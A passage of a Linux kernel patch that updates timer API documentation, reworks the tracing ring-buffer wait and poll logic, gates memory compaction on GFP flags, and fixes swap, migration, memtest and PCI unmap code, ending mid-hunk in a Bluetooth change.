+  *
+- * mod_timer_pending() is the same for pending timers as mod_timer(),
+- * but will not re-activate and modify already deleted timers.
++ * mod_timer_pending() is the same for pending timers as mod_timer(), but
++ * will not activate inactive timers.
+  *
+- * It is useful for unserialized use of timers.
++ * Return:
++ * * %0 - The timer was inactive and not modified
++ * * %1 - The timer was active and requeued to expire at @expires
+  */
+ int mod_timer_pending(struct timer_list *timer, unsigned long expires)
+ {
+@@ -1137,24 +1139,27 @@ int mod_timer_pending(struct timer_list *timer, unsigned long expires)
+ EXPORT_SYMBOL(mod_timer_pending);
+ 
+ /**
+- * mod_timer - modify a timer's timeout
+- * @timer: the timer to be modified
+- * @expires: new timeout in jiffies
+- *
+- * mod_timer() is a more efficient way to update the expire field of an
+- * active timer (if the timer is inactive it will be activated)
++ * mod_timer - Modify a timer's timeout
++ * @timer:	The timer to be modified
++ * @expires:	New absolute timeout in jiffies
+  *
+  * mod_timer(timer, expires) is equivalent to:
+  *
+  *     del_timer(timer); timer->expires = expires; add_timer(timer);
+  *
++ * mod_timer() is more efficient than the above open coded sequence. If
++ * the timer is inactive, the del_timer() part is a NOP. The
++ * timer is in any case activated with the new expiry time @expires.
++ *
+  * Note that if there are multiple unserialized concurrent users of the
+  * same timer, then mod_timer() is the only safe way to modify the timeout,
+  * since add_timer() cannot modify an already running timer.
+  *
+- * The function returns whether it has modified a pending timer or not.
+- * (ie. mod_timer() of an inactive timer returns 0, mod_timer() of an
+- * active timer returns 1.)
++ * Return:
++ * * %0 - The timer was inactive and started
++ * * %1 - The timer was active and requeued to expire at @expires or
++ *	  the timer was active and not modified because @expires did
++ *	  not change the effective expiry time
+  */
+ int mod_timer(struct timer_list *timer, unsigned long expires)
+ {
+@@ -1165,11 +1170,18 @@ EXPORT_SYMBOL(mod_timer);
+ /**
+  * timer_reduce - Modify a timer's timeout if it would reduce the timeout
+  * @timer:	The timer to be modified
+- * @expires:	New timeout in jiffies
++ * @expires:	New absolute timeout in jiffies
+  *
+  * timer_reduce() is very similar to mod_timer(), except that it will only
+- * modify a running timer if that would reduce the expiration time (it will
+- * start a timer that isn't running).
++ * modify an enqueued timer if that would reduce the expiration time. If
++ * @timer is not enqueued it starts the timer.
++ *
++ * Return:
++ * * %0 - The timer was inactive and started
++ * * %1 - The timer was active and requeued to expire at @expires or
++ *	  the timer was active and not modified because @expires
++ *	  did not change the effective expiry time such that the
++ *	  timer would expire earlier than already scheduled
+  */
+ int timer_reduce(struct timer_list *timer, unsigned long expires)
+ {
+@@ -1178,18 +1190,21 @@ int timer_reduce(struct timer_list *timer, unsigned long expires)
+ EXPORT_SYMBOL(timer_reduce);
+ 
+ /**
+- * add_timer - start a timer
+- * @timer: the timer to be added
++ * add_timer - Start a timer
++ * @timer:	The timer to be started
+  *
+- * The kernel will do a ->function(@timer) callback from the
+- * timer interrupt at the ->expires point in the future. The
+- * current time is 'jiffies'.
++ * Start @timer to expire at @timer->expires in the future. @timer->expires
++ * is the absolute expiry time measured in 'jiffies'. When the timer expires
++ * timer->function(timer) will be invoked from soft interrupt context.
+  *
+- * The timer's ->expires, ->function fields must be set prior calling this
+- * function.
++ * The @timer->expires and @timer->function fields must be set prior
++ * to calling this function.
+  *
+- * Timers with an ->expires field in the past will be executed in the next
+- * timer tick.
++ * If @timer->expires is already in the past @timer will be queued to
++ * expire at the next timer tick.
++ *
++ * This can only operate on an inactive timer. Attempts to invoke this on
++ * an active timer are rejected with a warning.
+  */
+ void add_timer(struct timer_list *timer)
+ {
+@@ -1199,11 +1214,13 @@ void add_timer(struct timer_list *timer)
+ EXPORT_SYMBOL(add_timer);
+ 
+ /**
+- * add_timer_on - start a timer on a particular CPU
+- * @timer: the timer to be added
+- * @cpu: the CPU to start it on
++ * add_timer_on - Start a timer on a particular CPU
++ * @timer:	The timer to be started
++ * @cpu:	The CPU to start it on
++ *
++ * Same as add_timer() except that it starts the timer on the given CPU.
+  *
+- * This is not very scalable on SMP. Double adds are not possible.
++ * See add_timer() for further details.
+  */
+ void add_timer_on(struct timer_list *timer, int cpu)
+ {
+@@ -1238,15 +1255,18 @@ void add_timer_on(struct timer_list *timer, int cpu)
+ EXPORT_SYMBOL_GPL(add_timer_on);
+ 
+ /**
+- * del_timer - deactivate a timer.
+- * @timer: the timer to be deactivated
+- *
+- * del_timer() deactivates a timer - this works on both active and inactive
+- * timers.
+- *
+- * The function returns whether it has deactivated a pending timer or not.
+- * (ie. del_timer() of an inactive timer returns 0, del_timer() of an
+- * active timer returns 1.)
++ * del_timer - Deactivate a timer.
++ * @timer:	The timer to be deactivated
++ *
++ * The function only deactivates a pending timer, but contrary to
++ * timer_delete_sync() it does not take into account whether the timer's
++ * callback function is concurrently executed on a different CPU or not.
++ * Nor does it prevent rearming of the timer. If @timer can be rearmed
++ * concurrently then the return value of this function is meaningless.
++ *
++ * Return:
++ * * %0 - The timer was not pending
++ * * %1 - The timer was pending and deactivated
+  */
+ int del_timer(struct timer_list *timer)
+ {
+@@ -1268,10 +1288,19 @@ EXPORT_SYMBOL(del_timer);
+ 
+ /**
+  * try_to_del_timer_sync - Try to deactivate a timer
+- * @timer: timer to delete
++ * @timer:	Timer to deactivate
++ *
++ * This function tries to deactivate a timer. On success the timer is not
++ * queued and the timer callback function is not running on any CPU.
++ *
++ * This function does not guarantee that the timer cannot be rearmed right
++ * after dropping the base lock. That needs to be prevented by the calling
++ * code if necessary.
+  *
+- * This function tries to deactivate a timer. Upon successful (ret >= 0)
+- * exit the timer is not queued and the handler is not running on any CPU.
++ * Return:
++ * * %0  - The timer was not pending
++ * * %1  - The timer was pending and deactivated
++ * * %-1 - The timer callback function is running on a different CPU
+  */
+ int try_to_del_timer_sync(struct timer_list *timer)
+ {
+@@ -1365,25 +1394,20 @@ static inline void timer_sync_wait_running(struct timer_base *base) { }
+ static inline void del_timer_wait_running(struct timer_list *timer) { }
+ #endif
+ 
+-#if defined(CONFIG_SMP) || defined(CONFIG_PREEMPT_RT)
+ /**
+- * del_timer_sync - deactivate a timer and wait for the handler to finish.
+- * @timer: the timer to be deactivated
+- *
+- * This function only differs from del_timer() on SMP: besides deactivating
+- * the timer it also makes sure the handler has finished executing on other
+- * CPUs.
++ * timer_delete_sync - Deactivate a timer and wait for the handler to finish.
++ * @timer:	The timer to be deactivated
+  *
+  * Synchronization rules: Callers must prevent restarting of the timer,
+  * otherwise this function is meaningless. It must not be called from
+  * interrupt contexts unless the timer is an irqsafe one. The caller must
+- * not hold locks which would prevent completion of the timer's
+- * handler. The timer's handler must not call add_timer_on(). Upon exit the
+- * timer is not queued and the handler is not running on any CPU.
++ * not hold locks which would prevent completion of the timer's callback
++ * function. The timer's handler must not call add_timer_on(). Upon exit
++ * the timer is not queued and the handler is not running on any CPU.
+  *
+- * Note: For !irqsafe timers, you must not hold locks that are held in
+- *   interrupt context while calling this function. Even if the lock has
+- *   nothing to do with the timer in question.  Here's why::
++ * For !irqsafe timers, the caller must not hold locks that are held in
++ * interrupt context. Even if the lock has nothing to do with the timer in
++ * question.  Here's why::
+  *
+  *    CPU0                             CPU1
+  *    ----                             ----
+@@ -1393,16 +1417,23 @@ static inline void del_timer_wait_running(struct timer_list *timer) { }
+  *    spin_lock_irq(somelock);
+  *                                     <IRQ>
+  *                                        spin_lock(somelock);
+- *    del_timer_sync(mytimer);
++ *    timer_delete_sync(mytimer);
+  *    while (base->running_timer == mytimer);
+  *
+- * Now del_timer_sync() will never return and never release somelock.
+- * The interrupt on the other CPU is waiting to grab somelock but
+- * it has interrupted the softirq that CPU0 is waiting to finish.
++ * Now timer_delete_sync() will never return and never release somelock.
++ * The interrupt on the other CPU is waiting to grab somelock but it has
++ * interrupted the softirq that CPU0 is waiting to finish.
++ *
++ * This function cannot guarantee that the timer is not rearmed again by
++ * some concurrent or preempting code, right after it dropped the base
++ * lock. If there is the possibility of a concurrent rearm then the return
++ * value of the function is meaningless.
+  *
+- * The function returns whether it has deactivated a pending timer or not.
++ * Return:
++ * * %0	- The timer was not pending
++ * * %1	- The timer was pending and deactivated
+  */
+-int del_timer_sync(struct timer_list *timer)
++int timer_delete_sync(struct timer_list *timer)
+ {
+ 	int ret;
+ 
+@@ -1442,8 +1473,7 @@ int del_timer_sync(struct timer_list *timer)
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(del_timer_sync);
+-#endif
++EXPORT_SYMBOL(timer_delete_sync);
+ 
+ static void call_timer_fn(struct timer_list *timer,
+ 			  void (*fn)(struct timer_list *),
+@@ -1465,8 +1495,8 @@ static void call_timer_fn(struct timer_list *timer,
+ #endif
+ 	/*
+ 	 * Couple the lock chain with the lock chain at
+-	 * del_timer_sync() by acquiring the lock_map around the fn()
+-	 * call here and in del_timer_sync().
++	 * timer_delete_sync() by acquiring the lock_map around the fn()
++	 * call here and in timer_delete_sync().
+ 	 */
+ 	lock_map_acquire(&lockdep_map);
+ 
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index e019a9278794f..431a922e5c89e 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -414,7 +414,6 @@ struct rb_irq_work {
+ 	struct irq_work			work;
+ 	wait_queue_head_t		waiters;
+ 	wait_queue_head_t		full_waiters;
+-	long				wait_index;
+ 	bool				waiters_pending;
+ 	bool				full_waiters_pending;
+ 	bool				wakeup_full;
+@@ -908,8 +907,19 @@ static void rb_wake_up_waiters(struct irq_work *work)
+ 
+ 	wake_up_all(&rbwork->waiters);
+ 	if (rbwork->full_waiters_pending || rbwork->wakeup_full) {
++		/* Only cpu_buffer sets the above flags */
++		struct ring_buffer_per_cpu *cpu_buffer =
++			container_of(rbwork, struct ring_buffer_per_cpu, irq_work);
++
++		/* Called from interrupt context */
++		raw_spin_lock(&cpu_buffer->reader_lock);
+ 		rbwork->wakeup_full = false;
+ 		rbwork->full_waiters_pending = false;
++
++		/* Waking up all waiters, they will reset the shortest full */
++		cpu_buffer->shortest_full = 0;
++		raw_spin_unlock(&cpu_buffer->reader_lock);
++
+ 		wake_up_all(&rbwork->full_waiters);
+ 	}
+ }
+@@ -949,14 +959,95 @@ void ring_buffer_wake_waiters(struct trace_buffer *buffer, int cpu)
+ 		rbwork = &cpu_buffer->irq_work;
+ 	}
+ 
+-	rbwork->wait_index++;
+-	/* make sure the waiters see the new index */
+-	smp_wmb();
+-
+ 	/* This can be called in any context */
+ 	irq_work_queue(&rbwork->work);
+ }
+ 
++static bool rb_watermark_hit(struct trace_buffer *buffer, int cpu, int full)
++{
++	struct ring_buffer_per_cpu *cpu_buffer;
++	bool ret = false;
++
++	/* Reads of all CPUs always waits for any data */
++	if (cpu == RING_BUFFER_ALL_CPUS)
++		return !ring_buffer_empty(buffer);
++
++	cpu_buffer = buffer->buffers[cpu];
++
++	if (!ring_buffer_empty_cpu(buffer, cpu)) {
++		unsigned long flags;
++		bool pagebusy;
++
++		if (!full)
++			return true;
++
++		raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
++		pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
++		ret = !pagebusy && full_hit(buffer, cpu, full);
++
++		if (!ret && (!cpu_buffer->shortest_full ||
++			     cpu_buffer->shortest_full > full)) {
++			cpu_buffer->shortest_full = full;
++		}
++		raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
++	}
++	return ret;
++}
++
++static inline bool
++rb_wait_cond(struct rb_irq_work *rbwork, struct trace_buffer *buffer,
++	     int cpu, int full, ring_buffer_cond_fn cond, void *data)
++{
++	if (rb_watermark_hit(buffer, cpu, full))
++		return true;
++
++	if (cond(data))
++		return true;
++
++	/*
++	 * The events can happen in critical sections where
++	 * checking a work queue can cause deadlocks.
++	 * After adding a task to the queue, this flag is set
++	 * only to notify events to try to wake up the queue
++	 * using irq_work.
++	 *
++	 * We don't clear it even if the buffer is no longer
++	 * empty. The flag only causes the next event to run
++	 * irq_work to do the work queue wake up. The worse
++	 * that can happen if we race with !trace_empty() is that
++	 * an event will cause an irq_work to try to wake up
++	 * an empty queue.
++	 *
++	 * There's no reason to protect this flag either, as
++	 * the work queue and irq_work logic will do the necessary
++	 * synchronization for the wake ups. The only thing
++	 * that is necessary is that the wake up happens after
++	 * a task has been queued. It's OK for spurious wake ups.
++	 */
++	if (full)
++		rbwork->full_waiters_pending = true;
++	else
++		rbwork->waiters_pending = true;
++
++	return false;
++}
++
++/*
++ * The default wait condition for ring_buffer_wait() is to just exit the
++ * wait loop the first time it is woken up.
++ */
++static bool rb_wait_once(void *data)
++{
++	long *once = data;
++
++	/* wait_event() actually calls this twice before scheduling */
++	if (*once > 1)
++		return true;
++
++	(*once)++;
++	return false;
++}
++
+ /**
+  * ring_buffer_wait - wait for input to the ring buffer
+  * @buffer: buffer to wait on
+@@ -970,101 +1061,39 @@ void ring_buffer_wake_waiters(struct trace_buffer *buffer, int cpu)
+ int ring_buffer_wait(struct trace_buffer *buffer, int cpu, int full)
+ {
+ 	struct ring_buffer_per_cpu *cpu_buffer;
+-	DEFINE_WAIT(wait);
+-	struct rb_irq_work *work;
+-	long wait_index;
++	struct wait_queue_head *waitq;
++	ring_buffer_cond_fn cond;
++	struct rb_irq_work *rbwork;
++	void *data;
++	long once = 0;
+ 	int ret = 0;
+ 
++	cond = rb_wait_once;
++	data = &once;
++
+ 	/*
+ 	 * Depending on what the caller is waiting for, either any
+ 	 * data in any cpu buffer, or a specific buffer, put the
+ 	 * caller on the appropriate wait queue.
+ 	 */
+ 	if (cpu == RING_BUFFER_ALL_CPUS) {
+-		work = &buffer->irq_work;
++		rbwork = &buffer->irq_work;
+ 		/* Full only makes sense on per cpu reads */
+ 		full = 0;
+ 	} else {
+ 		if (!cpumask_test_cpu(cpu, buffer->cpumask))
+ 			return -ENODEV;
+ 		cpu_buffer = buffer->buffers[cpu];
+-		work = &cpu_buffer->irq_work;
+-	}
+-
+-	wait_index = READ_ONCE(work->wait_index);
+-
+-	while (true) {
+-		if (full)
+-			prepare_to_wait(&work->full_waiters, &wait, TASK_INTERRUPTIBLE);
+-		else
+-			prepare_to_wait(&work->waiters, &wait, TASK_INTERRUPTIBLE);
+-
+-		/*
+-		 * The events can happen in critical sections where
+-		 * checking a work queue can cause deadlocks.
+-		 * After adding a task to the queue, this flag is set
+-		 * only to notify events to try to wake up the queue
+-		 * using irq_work.
+-		 *
+-		 * We don't clear it even if the buffer is no longer
+-		 * empty. The flag only causes the next event to run
+-		 * irq_work to do the work queue wake up. The worse
+-		 * that can happen if we race with !trace_empty() is that
+-		 * an event will cause an irq_work to try to wake up
+-		 * an empty queue.
+-		 *
+-		 * There's no reason to protect this flag either, as
+-		 * the work queue and irq_work logic will do the necessary
+-		 * synchronization for the wake ups. The only thing
+-		 * that is necessary is that the wake up happens after
+-		 * a task has been queued. It's OK for spurious wake ups.
+-		 */
+-		if (full)
+-			work->full_waiters_pending = true;
+-		else
+-			work->waiters_pending = true;
+-
+-		if (signal_pending(current)) {
+-			ret = -EINTR;
+-			break;
+-		}
+-
+-		if (cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer))
+-			break;
+-
+-		if (cpu != RING_BUFFER_ALL_CPUS &&
+-		    !ring_buffer_empty_cpu(buffer, cpu)) {
+-			unsigned long flags;
+-			bool pagebusy;
+-			bool done;
+-
+-			if (!full)
+-				break;
+-
+-			raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
+-			pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
+-			done = !pagebusy && full_hit(buffer, cpu, full);
+-
+-			if (!cpu_buffer->shortest_full ||
+-			    cpu_buffer->shortest_full > full)
+-				cpu_buffer->shortest_full = full;
+-			raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
+-			if (done)
+-				break;
+-		}
+-
+-		schedule();
+-
+-		/* Make sure to see the new wait index */
+-		smp_rmb();
+-		if (wait_index != work->wait_index)
+-			break;
++		rbwork = &cpu_buffer->irq_work;
+ 	}
+ 
+ 	if (full)
+-		finish_wait(&work->full_waiters, &wait);
++		waitq = &rbwork->full_waiters;
+ 	else
+-		finish_wait(&work->waiters, &wait);
++		waitq = &rbwork->waiters;
++
++	ret = wait_event_interruptible((*waitq),
++				rb_wait_cond(rbwork, buffer, cpu, full, cond, data));
+ 
+ 	return ret;
+ }
+@@ -1088,30 +1117,51 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 			  struct file *filp, poll_table *poll_table, int full)
+ {
+ 	struct ring_buffer_per_cpu *cpu_buffer;
+-	struct rb_irq_work *work;
++	struct rb_irq_work *rbwork;
+ 
+ 	if (cpu == RING_BUFFER_ALL_CPUS) {
+-		work = &buffer->irq_work;
++		rbwork = &buffer->irq_work;
+ 		full = 0;
+ 	} else {
+ 		if (!cpumask_test_cpu(cpu, buffer->cpumask))
+ 			return EPOLLERR;
+ 
+ 		cpu_buffer = buffer->buffers[cpu];
+-		work = &cpu_buffer->irq_work;
++		rbwork = &cpu_buffer->irq_work;
+ 	}
+ 
+ 	if (full) {
+-		poll_wait(filp, &work->full_waiters, poll_table);
+-		work->full_waiters_pending = true;
++		unsigned long flags;
++
++		poll_wait(filp, &rbwork->full_waiters, poll_table);
++
++		raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
+ 		if (!cpu_buffer->shortest_full ||
+ 		    cpu_buffer->shortest_full > full)
+ 			cpu_buffer->shortest_full = full;
+-	} else {
+-		poll_wait(filp, &work->waiters, poll_table);
+-		work->waiters_pending = true;
++		raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
++		if (full_hit(buffer, cpu, full))
++			return EPOLLIN | EPOLLRDNORM;
++		/*
++		 * Only allow full_waiters_pending update to be seen after
++		 * the shortest_full is set. If the writer sees the
++		 * full_waiters_pending flag set, it will compare the
++		 * amount in the ring buffer to shortest_full. If the amount
++		 * in the ring buffer is greater than the shortest_full
++		 * percent, it will call the irq_work handler to wake up
++		 * this list. The irq_work handler will reset shortest_full
++		 * back to zero. That's done under the reader_lock, but
++		 * the below smp_mb() makes sure that the update to
++		 * full_waiters_pending doesn't leak up into the above.
++		 */
++		smp_mb();
++		rbwork->full_waiters_pending = true;
++		return 0;
+ 	}
+ 
++	poll_wait(filp, &rbwork->waiters, poll_table);
++	rbwork->waiters_pending = true;
++
+ 	/*
+ 	 * There's a tight race between setting the waiters_pending and
+ 	 * checking if the ring buffer is empty.  Once the waiters_pending bit
+@@ -1127,9 +1177,6 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 	 */
+ 	smp_mb();
+ 
+-	if (full)
+-		return full_hit(buffer, cpu, full) ? EPOLLIN | EPOLLRDNORM : 0;
+-
+ 	if ((cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer)) ||
+ 	    (cpu != RING_BUFFER_ALL_CPUS && !ring_buffer_empty_cpu(buffer, cpu)))
+ 		return EPOLLIN | EPOLLRDNORM;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index f667d6bdddda5..f2b00ea38111a 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -8278,6 +8278,20 @@ tracing_buffers_read(struct file *filp, char __user *ubuf,
+ 	return size;
+ }
+ 
++static int tracing_buffers_flush(struct file *file, fl_owner_t id)
++{
++	struct ftrace_buffer_info *info = file->private_data;
++	struct trace_iterator *iter = &info->iter;
++
++	iter->wait_index++;
++	/* Make sure the waiters see the new wait_index */
++	smp_wmb();
++
++	ring_buffer_wake_waiters(iter->array_buffer->buffer, iter->cpu_file);
++
++	return 0;
++}
++
+ static int tracing_buffers_release(struct inode *inode, struct file *file)
+ {
+ 	struct ftrace_buffer_info *info = file->private_data;
+@@ -8289,12 +8303,6 @@ static int tracing_buffers_release(struct inode *inode, struct file *file)
+ 
+ 	__trace_array_put(iter->tr);
+ 
+-	iter->wait_index++;
+-	/* Make sure the waiters see the new wait_index */
+-	smp_wmb();
+-
+-	ring_buffer_wake_waiters(iter->array_buffer->buffer, iter->cpu_file);
+-
+ 	if (info->spare)
+ 		ring_buffer_free_read_page(iter->array_buffer->buffer,
+ 					   info->spare_cpu, info->spare);
+@@ -8508,6 +8516,7 @@ static const struct file_operations tracing_buffers_fops = {
+ 	.read		= tracing_buffers_read,
+ 	.poll		= tracing_buffers_poll,
+ 	.release	= tracing_buffers_release,
++	.flush		= tracing_buffers_flush,
+ 	.splice_read	= tracing_buffers_splice_read,
+ 	.unlocked_ioctl = tracing_buffers_ioctl,
+ 	.llseek		= no_llseek,
+diff --git a/lib/pci_iomap.c b/lib/pci_iomap.c
+index ce39ce9f3526e..2829ddb0e316b 100644
+--- a/lib/pci_iomap.c
++++ b/lib/pci_iomap.c
+@@ -170,8 +170,8 @@ void pci_iounmap(struct pci_dev *dev, void __iomem *p)
+ 
+ 	if (addr >= start && addr < start + IO_SPACE_LIMIT)
+ 		return;
+-	iounmap(p);
+ #endif
++	iounmap(p);
+ }
+ EXPORT_SYMBOL(pci_iounmap);
+ 
+diff --git a/mm/compaction.c b/mm/compaction.c
+index 8238e83385a79..23af5f3b2ccaf 100644
+--- a/mm/compaction.c
++++ b/mm/compaction.c
+@@ -2570,16 +2570,11 @@ enum compact_result try_to_compact_pages(gfp_t gfp_mask, unsigned int order,
+ 		unsigned int alloc_flags, const struct alloc_context *ac,
+ 		enum compact_priority prio, struct page **capture)
+ {
+-	int may_perform_io = (__force int)(gfp_mask & __GFP_IO);
+ 	struct zoneref *z;
+ 	struct zone *zone;
+ 	enum compact_result rc = COMPACT_SKIPPED;
+ 
+-	/*
+-	 * Check if the GFP flags allow compaction - GFP_NOIO is really
+-	 * tricky context because the migration might require IO
+-	 */
+-	if (!may_perform_io)
++	if (!gfp_compaction_allowed(gfp_mask))
+ 		return COMPACT_SKIPPED;
+ 
+ 	trace_mm_compaction_try_to_compact_pages(order, gfp_mask, prio);
+diff --git a/mm/kasan/kasan_test.c b/mm/kasan/kasan_test.c
+index 0d59098f08761..cef683a2e0d2e 100644
+--- a/mm/kasan/kasan_test.c
++++ b/mm/kasan/kasan_test.c
+@@ -415,7 +415,8 @@ static void kmalloc_oob_16(struct kunit *test)
+ 	/* This test is specifically crafted for the generic mode. */
+ 	KASAN_TEST_NEEDS_CONFIG_ON(test, CONFIG_KASAN_GENERIC);
+ 
+-	ptr1 = kmalloc(sizeof(*ptr1) - 3, GFP_KERNEL);
++	/* RELOC_HIDE to prevent gcc from warning about short alloc */
++	ptr1 = RELOC_HIDE(kmalloc(sizeof(*ptr1) - 3, GFP_KERNEL), 0);
+ 	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, ptr1);
+ 
+ 	ptr2 = kmalloc(sizeof(*ptr2), GFP_KERNEL);
+diff --git a/mm/memtest.c b/mm/memtest.c
+index f53ace709ccd8..d407373f225b4 100644
+--- a/mm/memtest.c
++++ b/mm/memtest.c
+@@ -46,10 +46,10 @@ static void __init memtest(u64 pattern, phys_addr_t start_phys, phys_addr_t size
+ 	last_bad = 0;
+ 
+ 	for (p = start; p < end; p++)
+-		*p = pattern;
++		WRITE_ONCE(*p, pattern);
+ 
+ 	for (p = start; p < end; p++, start_phys_aligned += incr) {
+-		if (*p == pattern)
++		if (READ_ONCE(*p) == pattern)
+ 			continue;
+ 		if (start_phys_aligned == last_bad + incr) {
+ 			last_bad += incr;
+diff --git a/mm/migrate.c b/mm/migrate.c
+index c93dd6a31c31a..c5968021fde0a 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -423,8 +423,12 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 	if (folio_test_swapbacked(folio)) {
+ 		__folio_set_swapbacked(newfolio);
+ 		if (folio_test_swapcache(folio)) {
++			int i;
++
+ 			folio_set_swapcache(newfolio);
+-			newfolio->private = folio_get_private(folio);
++			for (i = 0; i < nr; i++)
++				set_page_private(folio_page(newfolio, i),
++					page_private(folio_page(folio, i)));
+ 		}
+ 		entries = nr;
+ 	} else {
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index c783806eefc9f..a7537da43bd45 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -5012,6 +5012,7 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 						struct alloc_context *ac)
+ {
+ 	bool can_direct_reclaim = gfp_mask & __GFP_DIRECT_RECLAIM;
++	bool can_compact = gfp_compaction_allowed(gfp_mask);
+ 	const bool costly_order = order > PAGE_ALLOC_COSTLY_ORDER;
+ 	struct page *page = NULL;
+ 	unsigned int alloc_flags;
+@@ -5090,7 +5091,7 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 	 * Don't try this for allocations that are allowed to ignore
+ 	 * watermarks, as the ALLOC_NO_WATERMARKS attempt didn't yet happen.
+ 	 */
+-	if (can_direct_reclaim &&
++	if (can_direct_reclaim && can_compact &&
+ 			(costly_order ||
+ 			   (order > 0 && ac->migratetype != MIGRATE_MOVABLE))
+ 			&& !gfp_pfmemalloc_allowed(gfp_mask)) {
+@@ -5188,9 +5189,10 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 
+ 	/*
+ 	 * Do not retry costly high order allocations unless they are
+-	 * __GFP_RETRY_MAYFAIL
++	 * __GFP_RETRY_MAYFAIL and we can compact
+ 	 */
+-	if (costly_order && !(gfp_mask & __GFP_RETRY_MAYFAIL))
++	if (costly_order && (!can_compact ||
++			     !(gfp_mask & __GFP_RETRY_MAYFAIL)))
+ 		goto nopage;
+ 
+ 	if (should_reclaim_retry(gfp_mask, order, ac, alloc_flags,
+@@ -5203,7 +5205,7 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 	 * implementation of the compaction depends on the sufficient amount
+ 	 * of free memory (see __compaction_suitable)
+ 	 */
+-	if (did_some_progress > 0 &&
++	if (did_some_progress > 0 && can_compact &&
+ 			should_compact_retry(ac, order, alloc_flags,
+ 				compact_result, &compact_priority,
+ 				&compaction_retries))
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index cca9fda9d036f..0d6182db44a6a 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -1222,6 +1222,18 @@ static unsigned char __swap_entry_free_locked(struct swap_info_struct *p,
+ }
+ 
+ /*
++ * When we get a swap entry, if there aren't some other ways to
++ * prevent swapoff, such as the folio in swap cache is locked, page
++ * table lock is held, etc., the swap entry may become invalid because
++ * of swapoff.  Then, we need to enclose all swap related functions
++ * with get_swap_device() and put_swap_device(), unless the swap
++ * functions call get/put_swap_device() by themselves.
++ *
++ * Note that when only holding the PTL, swapoff might succeed immediately
++ * after freeing a swap entry. Therefore, immediately after
++ * __swap_entry_free(), the swap info might become stale and should not
++ * be touched without a prior get_swap_device().
++ *
+  * Check whether swap entry is valid in the swap device.  If so,
+  * return pointer to swap_info_struct, and keep the swap entry valid
+  * via preventing the swap device from being swapoff, until
+@@ -1230,9 +1242,8 @@ static unsigned char __swap_entry_free_locked(struct swap_info_struct *p,
+  * Notice that swapoff or swapoff+swapon can still happen before the
+  * percpu_ref_tryget_live() in get_swap_device() or after the
+  * percpu_ref_put() in put_swap_device() if there isn't any other way
+- * to prevent swapoff, such as page lock, page table lock, etc.  The
+- * caller must be prepared for that.  For example, the following
+- * situation is possible.
++ * to prevent swapoff.  The caller must be prepared for that.  For
++ * example, the following situation is possible.
+  *
+  *   CPU1				CPU2
+  *   do_swap_page()
+@@ -1624,13 +1635,19 @@ int free_swap_and_cache(swp_entry_t entry)
+ 	if (non_swap_entry(entry))
+ 		return 1;
+ 
+-	p = _swap_info_get(entry);
++	p = get_swap_device(entry);
+ 	if (p) {
++		if (WARN_ON(data_race(!p->swap_map[swp_offset(entry)]))) {
++			put_swap_device(p);
++			return 0;
++		}
++
+ 		count = __swap_entry_free(p, entry);
+ 		if (count == SWAP_HAS_CACHE &&
+ 		    !swap_page_trans_huge_swapped(p, entry))
+ 			__try_to_reclaim_swap(p, swp_offset(entry),
+ 					      TTRS_UNMAPPED | TTRS_FULL);
++		put_swap_device(p);
+ 	}
+ 	return p != NULL;
+ }
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 9f3cfb7caa48d..a3b1d8e5dbb3d 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -6024,7 +6024,7 @@ static void shrink_lruvec(struct lruvec *lruvec, struct scan_control *sc)
+ /* Use reclaim/compaction for costly allocs or under memory pressure */
+ static bool in_reclaim_compaction(struct scan_control *sc)
+ {
+-	if (IS_ENABLED(CONFIG_COMPACTION) && sc->order &&
++	if (gfp_compaction_allowed(sc->gfp_mask) && sc->order &&
+ 			(sc->order > PAGE_ALLOC_COSTLY_ORDER ||
+ 			 sc->priority < DEF_PRIORITY - 2))
+ 		return true;
+@@ -6266,6 +6266,9 @@ static inline bool compaction_ready(struct zone *zone, struct scan_control *sc)
+ 	unsigned long watermark;
+ 	enum compact_result suitable;
+ 
++	if (!gfp_compaction_allowed(sc->gfp_mask))
++		return false;
++
+ 	suitable = compaction_suitable(zone, sc->order, 0, sc->reclaim_idx);
+ 	if (suitable == COMPACT_SUCCESS)
+ 		/* Allocation should succeed already. Don't reclaim. */
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 70f24dc75b596..02e67ff05b7b4 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2838,7 +2838,7 @@ static void hci_cancel_cmd_sync(struct hci_dev *hdev, int err)
+ 	cancel_delayed_work_sync(&hdev->ncmd_timer);
+ 	atomic_set(&hdev->cmd_cnt, 1);
+ 
+-	hci_cmd_sync_cancel_sync(hdev, -err);
